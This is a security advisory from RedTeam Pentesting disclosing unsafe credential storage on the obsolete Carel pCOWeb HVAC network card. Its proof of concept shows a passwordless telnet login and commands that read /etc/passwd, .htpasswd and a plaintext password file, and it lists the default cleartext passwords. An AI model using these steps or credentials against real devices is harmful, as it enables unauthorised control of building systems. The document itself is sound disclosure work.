Unsafe Storage of Credentials in Carel pCOWeb HVAC
The Carel pCOWeb card stores password hashes in the file “/etc/passwd”, allowing privilege escalation by authenticated users. Additionally, plaintext copies of the passwords are stored.
Details
- Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
- Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
- Fixed Versions: product obsolete
- Vulnerability Type: Credential Disclosure / Privilege Escalation
- Security Risk: low
- Vendor URL:
https://www.carel.com/product/pcoweb-card
- Vendor Status: notified / product obsolete
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2019-013
- Advisory Status: published
- CVE: GENERIC-MAP-NOMATCH
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)
It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.
More Details
The Carel pCOWeb interface provides user accounts with different levels
of privileges. Despite the different privileges, other users, even the
user nobody, are able to read the file “/etc/passwd” which contains the
hashed passwords for all user accounts, especially those with more
privileges. Additionally, a plaintext copy of all passwords is stored in
the file /usr/local/root/flash/etc/sysconfig/userspwd, which is
accessible from the web interface at the URL
http://192.168.0.1/config/pw_changeusers.html
This allows attackers with knowledge of one user account password to
gain knowledge of the other accounts passwords, possibly gaining more
privileges.
Proof of Concept
Apart from a web interface, the Carel pCOWeb card provides a telnet interface accessible using a variety of default passwords and, in some cases, the user “nobody” without password:
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Linux 2.4.21-rmk1 (pCOWeb) (ttya0)
pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r-- 1 root root 317 Jan 1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$
The following table lists the cleartext passwords for above password hashes:
username | password
root | froot httpadmin | fhttpadm carel | fcarel guest | fguest nobody | (none) admin | fadmin
The passwords for the useraccounts “root”, “httpadmin”, “carel” and “guest” are documented in section 9.7.2 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0), warning users:
“it is important to set a password other than the default “froot” to
prevent potentially dangerous outside access.”
It is possible that these default credentials are covered in CVE-2019-13553. Depending on firmware version and/or OEM modifications, some versions additionally allow Telnet login without password with the username “nobody” while it is disabled for other versions.
The password for the web interface user “admin” is documented in section 9.2.1 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0).
Additionally, some versions were seen with additional user credentials stored in the directory provided for OEM modifications of the web interface, such as the username “reserved” with the password “freserve” in “/usr/local/root/flash/http/reserved/.htpasswd”. Storing some of these passwords in plaintext is covered in CVE-2019-11369.
However, while the above passwords are stored in hashed form, the web
interface at http://192.168.0.1/config/pw_changeusers.html
shows them in
plaintext. A file containing the plaintext passwords can be found in the
filesystem:
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
Workaround
Change all default passwords listed above and ensure the user “nobody” is disabled or has a password set. The Carel pCOWeb card should not be connected to networks accessible by untrusted users (compare advisory rt-sa-2019-014 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt)).
Fix
No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.
Security Risk
Attackers with knowledge of one set of user credentials to a Carel pCOWeb card could use the password hashes accessible to all users in “/etc/passwd” or the plaintext copies of the passwords to gain different privileges. Due to the necessity of access to credentials, this is considered to pose a low risk only.
Timeline
- 2019-07-17 Vulnerability identified
- 2019-08-03 Customer approved disclosure to vendor
- 2019-09-02 Vendor notified
- 2019-09-09 Vendor did not respond as promised
- 2019-09-17 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-10-28 Advisory published due to publication of CVE-2019-13553
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/